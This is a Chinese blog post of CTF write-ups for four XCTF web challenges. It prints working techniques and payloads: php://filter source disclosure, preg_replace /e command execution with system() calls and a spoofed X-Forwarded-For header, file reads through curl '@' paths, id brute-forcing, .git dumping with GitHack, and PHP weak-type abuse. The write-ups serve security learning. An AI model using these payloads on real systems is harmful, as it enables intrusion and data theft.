<!DOCTYPE HTML>
<html lang="zh-CN">


<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
    <meta name="keywords" content="攻防世界web进阶, NEUQ  CTF 子实  ZiShi 计算机科学与技术 网络安全">
    <meta name="baidu-site-verification" content>
    <meta name="google-site-verification" content>
    <meta name="description" content="攻防世界web进阶Cat抓住那只猫
预备知识url编码字符集url编码是在浏览器获取的网址包含特殊字符时会将其转换为对应的编码，当然如果正常字符直接使用编码浏览器也是可以正常访问的。
当然如果获取到的编码超过了url编码的限制就可能会出现报">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <title>攻防世界web进阶 | ZS BLOG</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/font-awesome.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">
    
    <link rel="stylesheet" href="/live2d/css/live2d.css">
    
    <style type="text/css">
        code[class*="language-"],
            pre[class*="language-"] {
                white-space: pre !important;
            }

            
    </style>

    <script src="/libs/jquery/jquery-2.2.0.min.js"></script>
    <script src="https://sdk.jinrishici.com/v2/browser/jinrishici.js" charset="utf-8"></script>
	<!-- 百度分析 -->
    <script>
        var _hmt = _hmt || [];
        (function() {
          var hm = document.createElement("script");
          hm.src = "https://hm.baidu.com/hm.js?565fade86908947330ff1e379e1ce450";
          var s = document.getElementsByTagName("script")[0]; 
          s.parentNode.insertBefore(hm, s);
        })();
    </script>
    
    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-136533117-2"></script>
    <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
      gtag('config', 'UA-136533117-2');
    </script>

<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>

<body>

<header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">ZS BLOG</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fa fa-navicon"></i></a>
<ul class="right">
    
    <li class="hide-on-med-and-down">
        <a href="/" class="waves-effect waves-light">
            
            <span>首页</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/tags" class="waves-effect waves-light">
            
            <span>标签</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/categories" class="waves-effect waves-light">
            
            <span>分类</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/archives" class="waves-effect waves-light">
            
            <span>归档</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/about" class="waves-effect waves-light">
            
            <span>关于</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/friends" class="waves-effect waves-light">
            
            <span>友情链接</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/contact" class="waves-effect waves-light">
            
            <span>留言板</span>
        </a>
    </li>
    
    <li>
        <a href="#searchModal" class="modal-trigger waves-effect waves-light">
            <i id="searchIcon" class="fa fa-search" title="搜索"></i>
        </a>
    </li>
</ul>

<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">ZS BLOG</div>
        <div class="logo-desc">
            
            东北大学秦皇岛分校 | 计算机科学与技术 | 网络安全
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li>
            <a href="/" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-link"></i>
                
                首页
            </a>
        </li>
        
        <li>
            <a href="/tags" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-link"></i>
                
                标签
            </a>
        </li>
        
        <li>
            <a href="/categories" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-link"></i>
                
                分类
            </a>
        </li>
        
        <li>
            <a href="/archives" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-link"></i>
                
                归档
            </a>
        </li>
        
        <li>
            <a href="/about" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-link"></i>
                
                关于
            </a>
        </li>
        
        <li>
            <a href="/friends" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-link"></i>
                
                友情链接
            </a>
        </li>
        
        <li>
            <a href="/contact" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-link"></i>
                
                留言板
            </a>
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/newlzs" class="waves-effect waves-light" target="_blank">
                <i class="fa fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>

        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/newlzs" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>


<script src="/libs/cryptojs/crypto-js.min.js"></script>
<script>
    (function() {
        let pwd = '';
        if (pwd && pwd.length > 0) {
            if (pwd !== CryptoJS.SHA256(prompt('请输入访问本文章的密码')).toString(CryptoJS.enc.Hex)) {
                alert('密码错误，将返回主页！');
                location.href = '/';
            }
        }
    })();
</script>




<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/2.jpg')">
    <div class="container">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <div class="description center-align post-title">
                        攻防世界web进阶
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>



<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link::before {
        background-color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 20px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                        <a href="/tags/web/" target="_blank">
                            <span class="chip bg-color">web</span>
                        </a>
                        
                        <a href="/tags/CTF/" target="_blank">
                            <span class="chip bg-color">CTF</span>
                        </a>
                        
                        <a href="/tags/竞赛/" target="_blank">
                            <span class="chip bg-color">竞赛</span>
                        </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fa fa-bookmark fa-fw icon-category"></i>
                        
                        <a href="/categories/网络安全/" class="post-category" target="_blank">
                            网络安全
                        </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                <div class="post-date info-break-policy">
                    <i class="fa fa-calendar-minus-o fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2019-09-25
                </div>

                <div class="post-author info-break-policy">
                    <i class="fa fa-user-o fa-fw"></i>作者:&nbsp;&nbsp;
                    
                    ZS
                    
                </div>

                
                
                <div class="info-break-policy">
                    <i class="fa fa-file-word-o fa-fw"></i>文章字数:&nbsp;&nbsp;
                    5.8k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="fa fa-clock-o fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    22 分
                </div>
                
                

                
                <div id="busuanzi_container_page_pv" class="info-break-policy">
                    <i class="fa fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                    <span id="busuanzi_value_page_pv"></span>
                </div>
                
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="攻防世界web进阶"><a href="#攻防世界web进阶" class="headerlink" title="攻防世界web进阶"></a>攻防世界web进阶</h1><h2 id="Cat"><a href="#Cat" class="headerlink" title="Cat"></a>Cat</h2><p>抓住那只猫</p>
<h3 id="预备知识"><a href="#预备知识" class="headerlink" title="预备知识"></a>预备知识</h3><h4 id="url编码字符集"><a href="#url编码字符集" class="headerlink" title="url编码字符集"></a>url编码字符集</h4><p>url编码是在浏览器获取的网址包含特殊字符时会将其转换为对应的编码，当然如果正常字符直接使用编码浏览器也是可以正常访问的。</p>
<p>当然如果获取到的编码超过了url编码的限制就可能会出现报错的情况。一般情况下编码超过%80就会出现报错</p>
<p><img src="https://ae01.alicdn.com/kf/Habe565cf7f7a48a19ad2d32d8fef11faD.png" alt></p>
<h4 id="Django-DEBUGE-True"><a href="#Django-DEBUGE-True" class="headerlink" title="Django DEBUGE = True"></a>Django DEBUGE = True</h4><ol>
<li>如果开启了DEBUG模式，那么以后我们修改了Django项目的代码，然后按下ctrl+s，那么Django就会自动的给我们重启项目，不需要手动重启。</li>
<li>如果开启了DEBUG模式，那么以后Django项目中的代码出现bug了，那么在浏览器中和控制台会打印出错信息。否则的我们很难寻找到bug的位置，也不方便调试代码。</li>
<li>在生产环境中，禁止开启DEBUG = True，因为当你的网站出错误时，别人能看到你的源代码，而我们也不需要给用户看到这些错误信息。所以需要关掉DEBUG = True，即设置DEBUG = False</li>
<li>如果设置了DEBUG = False，那么就必须设置settings.py中的ALLOWED_HOSTS.<br>ALLOWED_HOSTS：这个变量是用来设置以后别人只能通过这个变量中的ip地址或者域名来进行访问。</li>
</ol>
<h4 id="phpcurl"><a href="#phpcurl" class="headerlink" title="phpcurl"></a>phpcurl</h4><p>当<code>CURLOPT_SAFE_UPLOAD</code> 为ture时，如果在请求前面加上@的话phpcurl组件是会把后面的当作绝对路径请求来读取文件。当且仅当文件中存在中文字符时，Djanjo才会报错导致获取文件内容。</p>
<h3 id="题解"><a href="#题解" class="headerlink" title="题解"></a>题解</h3><ul>
<li><p>题目让我们输入域名，输入提示域名loli.club 没反应，那就输入几个常见的baidu.com也没反应，输入<code>127.0.0.1</code>返回ping的内容</p>
<pre><code>PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.064 ms

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.064/0.064/0.064/0.000 ms</code></pre><p>输入百度的ip<code>220.181.38.148</code> 也能得到ping的内容，感觉可以和控制台进行交互</p>
</li>
<li><p>尝试输入 <code>127.0.0.1||ls</code>,  <code>127.0.0.1&amp;&amp;ls</code>, <code>127.0.0.0;ls</code> 发现关键字均被屏蔽了。</p>
</li>
<li><p>尝试针对url地址进行搞事情，输入xxx?url=%80, 尝试输入超过gbk编码url编码，发现获得报错信息，赋值报错信息新建一个html文件，打开的得到最终的报错界面，发现这是一个Django的项目，并且DEBUGE 为 true。</p>
</li>
<li><p>可以判断后台运行了两个应用，一个时php应用，一个Django用来处理php发来的请求。</p>
</li>
<li><p>我们可以通过报错信息setting中的database字段获取到数据库的信息</p>
<p><img src="https://pic.superbed.cn/item/5d8ca596451253d178e85323.png" alt></p>
</li>
<li><p>访问<em><a href="http://111.198.29.45:40859/index.php?url=@/opt/api/database.sqlite3" target="_blank" rel="noopener">http://111.198.29.45:40859/index.php?url=@/opt/api/database.sqlite3</a></em>的到新的报错信息，还是复制报错信息到新的html文件中，打开发现了File字符段，应该是数据库中的内容，尝试搜索<code>ctf / flag</code>等关键字找到flag</p>
<p><img src="https://ae01.alicdn.com/kf/H2fadf0ab696b41c8ab3f9620cdfd2acbp.jpg" alt></p>
</li>
<li><p>答案：WHCTF{yoooo_Such_A_G00D_@}</p>
</li>
</ul>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><ul>
<li>php通过@访问文件，Djonga报错返回文件内容</li>
<li>url编码越界可能会引起报错</li>
</ul>
<h2 id="ics-05"><a href="#ics-05" class="headerlink" title="ics-05"></a>ics-05</h2><p>其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统</p>
<h3 id="预备知识-1"><a href="#预备知识-1" class="headerlink" title="预备知识"></a>预备知识</h3><h4 id="文件包含漏洞"><a href="#文件包含漏洞" class="headerlink" title="文件包含漏洞"></a>文件包含漏洞</h4><p><a href="https://www.freebuf.com/articles/web/182280.html" target="_blank" rel="noopener">Web安全实战系列：文件包含漏洞</a></p>
<h4 id="php伪协议"><a href="#php伪协议" class="headerlink" title="php伪协议"></a>php伪协议</h4><blockquote>
<p>file://     — 访问本地文件系统</p>
<p>http://     — 访问 HTTP(s) 网址</p>
<p>ftp://     — 访问 FTP(s) URLs</p>
<p>php://     — 访问各个输入/输出流（I/O streams）</p>
<p>zlib://     — 压缩流</p>
<p>data://     — 数据（RFC 2397）</p>
<p>glob://     — 查找匹配的文件路径模式</p>
<p>phar://     — PHP 归档</p>
<p>ssh2://     — Secure Shell 2</p>
<p>rar://     —RAR</p>
<p>ogg://      — 音频流</p>
<p>expect://     — 处理交互式的流</p>
</blockquote>
<ul>
<li><p>PHP.ini</p>
<p>在php.ini利用两个重要参数allow_url_fopen和allow_url_include</p>
<p>allow_url_fopen： 默认值为ON， 允许url里封装协议访问文件</p>
<p>allow_url_include：默认值为OFF，不允许包含url里的封装协议包含文件</p>
</li>
<li><p>php://filter</p>
<p>经常使用的伪协议，一般用于任意文件的读取，有时也可以用于getshell。在双OFF的情况下也可以使用。</p>
<p>php://filter是一种元封装器，用于数据流打开时筛选过滤应用。这对于一体式（all-in-one）的文件函数非常有用。类似readfile()、file()、fiel_get_contents()，在数据流读取之前没有机会使用其他过滤器。</p>
<p><strong>php://filter参数</strong></p>
<table>
<thead>
<tr>
<th align="left">名称</th>
<th align="left">描述</th>
</tr>
</thead>
<tbody><tr>
<td align="left">resource=&lt;要过滤的数据流&gt;</td>
<td align="left">这个参数是必须的，它指定了你要筛选过滤的数据流</td>
</tr>
<tr>
<td align="left">read=&lt;独链的筛选列表&gt;</td>
<td align="left">可选参数，可以设定一个或多个过滤器名称，以管道符`</td>
</tr>
<tr>
<td align="left">write=&lt;写链的筛选列表&gt;</td>
<td align="left">可选参数，可以设定一个或多个过滤器名称，以管道符`</td>
</tr>
<tr>
<td align="left">&lt;;两个链的筛选列表&gt;</td>
<td align="left">任何没有以read= 或 read= 做前缀的筛选器列表会视情况应用于读或写链</td>
</tr>
</tbody></table>
<blockquote>
<p>php://filter/[read/write]=string.[rot13/strip_tags/…]/resource=xxx</p>
</blockquote>
<p>filter和string过滤器连用可以对字符串进行过滤。filter的read和write参数有不同的应用场景。read用于include()和file_get_contents(), write用于file_put_contents()中。</p>
<blockquote>
<p>php://filter/convert.base64-[encode/decode]/resource=xxx</p>
</blockquote>
<p>这是使用的过滤器是convert.base64-encode。它的作用就是读取upload.php的内容进行base64编码后输出。可以用于读取程序源代码后经过base64编码后的数据。</p>
</li>
<li><p>php://input</p>
<p>php://input可以访问请求的原始数据的只读流，将post请求的数据当作php代码执行。当传入的参数作为文件名打开时，可以将参数设置为php://input, 同时post想设置的文件内容，php执行时会将post内容当作文件内容。</p>
<p>需要开启allow_url_include</p>
<p>注：当enctype=”multipart/form-data”时php://input是无效的</p>
</li>
<li><p>file://</p>
<p>file://伪协议在双OFF的时候也可用，用于本地文件包含</p>
<p>注：file://伪协议必须是绝对路径</p>
</li>
<li><p>phar://</p>
<p>PHP归档，常常跟文件包含，文件上传结合考察。通俗点就是php解压缩包的一个函数，解压的压缩包与后缀无关。</p>
<blockquote>
<p>phar://test.[zip/jpg/png….]/file.txt</p>
</blockquote>
<p>  其实可以将任意后缀名的文件(必须要有后缀名)，只要是zip格式压缩的，都可以进行解压，因此上面可以改为phar://test.test/file.txt也可以运行。</p>
</li>
<li><p>zip://,bzip2://,zlib://</p>
<p>在双OFF的时候也可以用</p>
<blockquote>
<p>zip://test.zip%23file.txt</p>
</blockquote>
<p>  和phar://一样用于读取压缩文件，不过对于“zip://test.zip#file.txt”中的“#”要编码为”%23“。因为url的#后的内容不会别传送</p>
</li>
<li><p>data://text/plain;base64,base编码字符串</p>
<p>很常用的数据流构造器，将读取后面base64编码字符串后解码的数据作为数据流的传入</p>
</li>
</ul>
<h4 id="preg-replace命令执行漏洞"><a href="#preg-replace命令执行漏洞" class="headerlink" title="preg_replace命令执行漏洞"></a>preg_replace命令执行漏洞</h4><ul>
<li><p>函数功能：执行一个正则表达式的搜索和替换</p>
</li>
<li><p>定义：</p>
<blockquote>
<p> mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &amp;$count ]] )</p>
</blockquote>
<p>搜索subject中匹配pattern的部分，如果匹配成功以replacement进行替换</p>
</li>
<li><p>漏洞：</p>
<ul>
<li>$pattern 存在/e模式修正符，允许代码执行</li>
<li>/e 修正符是<strong>preg_replace</strong>将$replacement当作php代码命令来执行</li>
<li>执行的另一个条件是匹配成功</li>
</ul>
</li>
<li><p>利用举例</p>
<p>​    <code>preg_replace(&quot;/123/e&quot;, &quot;system(&quot;ls&quot;)&quot;, &quot;123&quot;)</code></p>
</li>
<li><p>构造的向服务器发送请求的url中的特殊字符要使用其相应的url编码。</p>
</li>
</ul>
<h3 id="题解-1"><a href="#题解-1" class="headerlink" title="题解"></a>题解</h3><ul>
<li><p>访问地址得到一个页面，根据题目发现了一个设备维护中心的页面，点击进去</p>
<p><img src="https://ae01.alicdn.com/kf/Hf82099b111734726814e29437a874828b.jpg" alt></p>
<p>什么也没有，再点击云平台设备维护中心</p>
<p><img src="https://ae01.alicdn.com/kf/H5f6c690546b14a008ac9d91fa15b6cc25.jpg" alt></p>
<p>发现了get一个请求page=index，感觉像是文件包含漏洞</p>
<p><strong>LFI漏洞的黑盒判断方法：</strong><br><strong>单纯的从URL判断的话，URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞</strong></p>
</li>
<li><p>尝试输入<code>../</code>查看文件夹内容无果</p>
</li>
<li><p>尝试获取index.php源码，利用php伪协议</p>
<blockquote>
<p>?page=php://filter/read=convert.base64-encode/resource=index.php</p>
</blockquote>
<p>如果过滤器不设置为进行base64编码，则相当于进行网页请求，会持续执行index.php的代码返回页面。访问构造的url的到一段base64编码</p>
</li>
<li><p>base64转码得到index.php中的内容，下面为其中的一段</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token comment" spellcheck="true">//方便的实现输入输出的功能,正在开发中的功能，只能内部人员测试</span>

<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string">'HTTP_X_FORWARDED_FOR'</span><span class="token punctuation">]</span> <span class="token operator">===</span> <span class="token string">'127.0.0.1'</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>

    <span class="token keyword">echo</span> <span class="token string">"&lt;br >Welcome My Admin ! &lt;br >"</span><span class="token punctuation">;</span>

    <span class="token variable">$pattern</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span>pat<span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token variable">$replacement</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span>rep<span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token variable">$subject</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span>sub<span class="token punctuation">]</span><span class="token punctuation">;</span>

    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">isset</span><span class="token punctuation">(</span><span class="token variable">$pattern</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token function">isset</span><span class="token punctuation">(</span><span class="token variable">$replacement</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token function">isset</span><span class="token punctuation">(</span><span class="token variable">$subject</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token function">preg_replace</span><span class="token punctuation">(</span><span class="token variable">$pattern</span><span class="token punctuation">,</span> <span class="token variable">$replacement</span><span class="token punctuation">,</span> <span class="token variable">$subject</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span><span class="token keyword">else</span><span class="token punctuation">{</span>
        <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>

<span class="token punctuation">}</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>发现其中使用了preg_replace函数，而且对get到的变量没有进行过滤，那么我们便可以利用其命令执行模式<code>/e</code></p>
</li>
<li><p>我们首先要构造header的x-forwarded-for为本地地址<code>127.0.0.1</code>才可以执行 if 中的内容。</p>
<p>使用burp project可以修改header</p>
</li>
<li><p>构造get 变量使其能够执行preg_replace函数的命令模式</p>
<pre><code>?pat=/123/e&amp;rep=system(&quot;find+-name+flag*&quot;)&amp;sub=123 </code></pre><p>“+”在url中会被解释为空格，当然也能够使用<code>%20</code>。</p>
</li>
<li><p>补充url，访问，使用burpproject进行修改x-forwarded-for</p>
<p><img src="https://ae01.alicdn.com/kf/Hc908dc053cd54110a26aa7feb388300cZ.jpg" alt></p>
<p>得到返回的文件地址</p>
<p><img src="https://ae01.alicdn.com/kf/H375a7946d2b542a9af3b254c69ae0a47u.jpg" alt></p>
</li>
<li><p>再次构造get的变量</p>
<pre><code>?pat=/123/e&amp;rep=system(&quot;cat+./s3chahahaDir/flag/flag.php&quot;)&amp;sub=123 </code></pre><p>和上一步一样的访问步骤，修改x-forwarded-for, 最后查看网页源代码也可以查看burp project的http历史记录里面的响应</p>
<p><img src="https://ae01.alicdn.com/kf/He8e3b9ff04a54f20b997ffe152212d9bE.jpg" alt></p>
</li>
<li><p>答案：<code>cyberpeace{4b8c09620a7c82c9927c7c95f3f07d3d}</code></p>
</li>
</ul>
<blockquote>
<p>感谢</p>
<ul>
<li><a href="https://www.cnblogs.com/gaonuoqi/p/11386346.html" target="_blank" rel="noopener">https://www.cnblogs.com/gaonuoqi/p/11386346.html</a></li>
<li><a href="https://www.freebuf.com/articles/web/182280.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/web/182280.html</a></li>
<li><a href="https://www.cnblogs.com/dubhe-/p/9997842.html" target="_blank" rel="noopener">https://www.cnblogs.com/dubhe-/p/9997842.html</a></li>
</ul>
</blockquote>
<h2 id="ics-06"><a href="#ics-06" class="headerlink" title="ics-06"></a>ics-06</h2><p>云平台报表中心收集了设备管理基础服务的数据，但是数据被删除了，只有一处留下了入侵者的痕迹。</p>
<ul>
<li><p>根据题意打开那个云台报表中心页面</p>
<p><img src="https://ae01.alicdn.com/kf/H0e5353af4c4e4794a21aff2c4b96e93aQ.jpg" alt></p>
<p>发现get了一个名为id的变量，感觉像是sql注入，尝试了了一下发现不行，题目提示送分题，直接进行爆破</p>
</li>
<li><p>bur porject对id进行爆破，0-5000爆破，发现id=2333的时候文件长度不一样。</p>
<p><img src="https://ae01.alicdn.com/kf/H26da5ae39d8f4c07a77d9c69cc4d7599u.jpg" alt></p>
</li>
<li><p>答案：cyberpeace{f0aa51d11c3e11908c8b5ecca74ac81f}</p>
</li>
</ul>
<h2 id="lottery"><a href="#lottery" class="headerlink" title="lottery"></a>lottery</h2><h3 id="预备知识-2"><a href="#预备知识-2" class="headerlink" title="预备知识"></a>预备知识</h3><h4 id="git泄露"><a href="#git泄露" class="headerlink" title=".git泄露"></a>.git泄露</h4><p><img src="https://ae01.alicdn.com/kf/He585a0f097944dcaacbcb7983890591a9.jpg" alt></p>
<p>如上图，可以通过url+.git的方式访问到服务器的.git文件（不一定是显示出来，只要是可以访问到即可）便可以通过 GitHack工具获取到网站的原始目录与文件，具体的原理就不赘述了。</p>
<ul>
<li><p>GitHack使用方法：</p>
<blockquote>
<p>python2 .\GitHack.py <a href="http://111.198.29.45:41105/.git/" target="_blank" rel="noopener">http://111.198.29.45:41105/.git/</a></p>
</blockquote>
</li>
</ul>
<h4 id="php弱类型"><a href="#php弱类型" class="headerlink" title="php弱类型"></a>php弱类型</h4><p>bool类型的true是可以和任何数据弱类型相等</p>
<p>具体移步<a href="https://www.cnblogs.com/Mrsm1th/p/6745532.html" target="_blank" rel="noopener">php弱类型总结</a></p>
<h3 id="题解-2"><a href="#题解-2" class="headerlink" title="题解"></a>题解</h3><ul>
<li><p>访问页面，随便注册一个用户，发现是一个赌博游戏，点击Claim Your Prize发现可以用钱买flag，当然这个数目是巨大。</p>
</li>
<li><p>检查页面，尝试是否可以通过修改表单来改变我们的钱，发现我们的钱是存到服务器的数据库里的，只能通过那个猜数界面来进行改变，猜数界面也是通过服务器运行的，找不到bug。</p>
</li>
<li><p>尝试查看robots.txt文件，发现了有趣的东西</p>
<p><img src="https://ae01.alicdn.com/kf/Hbd0bfa0d85e64226a7aba142f68117aa8.jpg" alt></p>
<p>好像存在.git泄露</p>
</li>
<li><p>尝试使用GitHack获取网站文件</p>
<p><img src="https://ae01.alicdn.com/kf/H7b21c9d59b8b4ab4abcc13b73c1aba4bs.jpg" alt></p>
<p>成功获取。</p>
</li>
<li><p>之前我们检查可以发现，buy flag 和 猜数的那个界面都是指向api.php, 我们查看这个文件</p>
<p><img src="https://ae01.alicdn.com/kf/H74a7259d90c14d039c1f6bc395891540i.jpg" alt></p>
<p>发现了一个猜数的时候有一个弱类型漏洞，那么我们就可以利用这个漏洞来进行刷钱</p>
</li>
<li><p>Burp project 构建代理，拦截猜数页面，改变numbers的值，利用重发器进行重复刷钱。</p>
<p><img src="https://ae01.alicdn.com/kf/Hc03161e68f20418b90fc25a32cfdb517g.jpg" alt></p>
</li>
<li><p>刷够了之后返回页面刷新发现钱多了好多，然后购买flag</p>
<blockquote>
<p> cyberpeace{27c59265cabca6858ba22713d7e175ad}</p>
</blockquote>
</li>
</ul>
